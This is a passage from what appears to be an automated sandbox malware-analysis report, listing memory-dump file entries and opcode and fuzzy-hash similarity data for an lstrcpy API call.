                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 423666991059cf1bb62082bc2abf25450ea0520bb6f260fb7fdc612c97a7622c
                                • Instruction ID: 4bc32896d64585dc3a943f1c9ffc32c4f8c0eb57bcfbc5da8d0755f7e8e29233
                                • Opcode Fuzzy Hash: 423666991059cf1bb62082bc2abf25450ea0520bb6f260fb7fdc612c97a7622c
                                • Instruction Fuzzy Hash: 17110D74A127039BDB24AF3AD418927B7FABF46701B08062DA49AC7B40EB34EC018F54